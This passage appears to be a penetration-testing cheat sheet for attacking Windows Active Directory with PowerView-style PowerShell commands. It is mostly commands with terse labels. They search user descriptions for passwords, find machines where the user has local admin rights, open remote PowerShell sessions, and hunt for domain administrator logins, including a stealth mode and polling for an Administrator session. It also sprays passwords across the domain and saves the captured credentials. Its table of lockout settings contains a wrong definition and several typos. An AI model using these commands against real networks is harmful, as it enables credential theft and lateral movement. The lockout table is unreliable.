Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "admin"
Find-UserField -SearchField Description -SearchTerm "manage"
...- Find all machines on the current domain where the current user has local admin access (Get-NetComputer + Invoke-CheckLocalAdminAccess)
Find-LocalAdminAccess -Verbose- Find Administrative access
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
# No Stateful
Enter-PSSession -ComputerName targetcomputer.target.domain.local
# Stateful
$sess = New-Pssession -ComputerName targetcomputer.target.domain.local
Enter-Pssession -session $sess- If RPC and SMB are blocked check with WMI
. .\Find-WMILocalAdminAccess.ps1- Find local admins on all machines of the domain (Get-NetComputer+Get- NetLocalGroup)
Invoke-EnumerateLocalAdmin -Verbose- Find computers where a domain admin (or specified user/group) has sessions
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"- Confirm admin access
Invoke-UserHunter -CheckAccess- Find computers where a domain admin is logged-in ( Get-NetSession / Get-NetLoggedon )
Invoke-UserHunter -Stealth- WAIT FOR INCOMING SESSINON
Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator -Delay 5 -Verbose# CHECK POLICY AND CARE TO NOT LOCK ACCOUNTS
(Get-DomainPolicy)."system access"
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
| Setting Key | Explaination |
|---|---|
| LockoutDuration | The number of minutes that a locked-out account MUST remain locked out before automatically becoming unlocked. -1 = MUST be unclock by admin other = number of minutes |
| LockoutBadCount | Number of failed logon attempts after which a user account MUST be locked out. |
| ResetLockoutCount | Number of minutes after a failed logon attempt that the account MUST be locked out |
- Use this command to see the last password set of each user in the current domain
Get-UserProperty -Properties pwdlastset